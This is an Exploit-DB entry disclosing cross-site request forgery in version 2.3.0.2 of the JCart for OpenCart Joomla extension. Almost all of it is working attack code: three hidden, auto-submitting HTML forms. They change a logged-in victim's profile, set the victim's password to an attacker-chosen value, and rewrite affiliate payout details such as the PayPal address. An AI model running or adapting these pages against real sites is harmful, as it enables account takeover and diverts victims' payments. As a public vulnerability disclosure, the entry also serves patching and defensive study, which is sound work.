EDB-ID: 44788 | Author: L0RD | Published: 2018-05-28 | CVE: N/A | Type: Webapps | Platform: PHP | Vulnerable App: N/A | # Date: 2018-05-28
# Exploit Author: L0RD or [email protected]
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/jcart-for-opencart/
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Version: 2.3.0.2
# Tested on: Kali linux
===================================================
# POC :
# Change user information exploit :
<html>
<body>
<form action="http://site.com/jcart/account/edit.html" method="POST" enctype="multipart/form-data">
<input type="hidden" name="firstname" value="D3C0DE" />
<input type="hidden" name="lastname" value="revenge" />
<input type="hidden" name="email" value="decod3.n@gmail.com" />
<input type="hidden" name="telephone" value="100000" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Change password exploit :
<form action="http://site.com/jcart/account/password.html" method="POST" enctype="multipart/form-data">
<input type="hidden" name="password" value="2468" />
<input type="hidden" name="confirm" value="2468" />
</form>
<script>
document.forms[0].submit();
</script>
# Change affiliate account information exploit :
<form action="http://site.com/jcart/account/affiliate/edit.html" method="POST" enctype="multipart/form-data">
<input type="hidden" name="company" value="decode" />
<input type="hidden" name="website" value="test.com" />
<input type="hidden" name="tax" value="100000000" />
<input type="hidden" name="payment" value="paypal" />
<input type="hidden" name="cheque" value=" " />
<input type="hidden" name="paypal" value="test@test.com" />
<input type="hidden" name="bank_name" value=" " />
<input type="hidden" name="bank_branch_number" value=" "
/>
<input type="hidden" name="bank_swift_code" value=" " />
<input type="hidden" name="bank_account_name" value=" " />
<input type="hidden" name="bank_account_number" value=" "
/>
</form>
<script>
document.forms[0].submit();
</script>
====================================================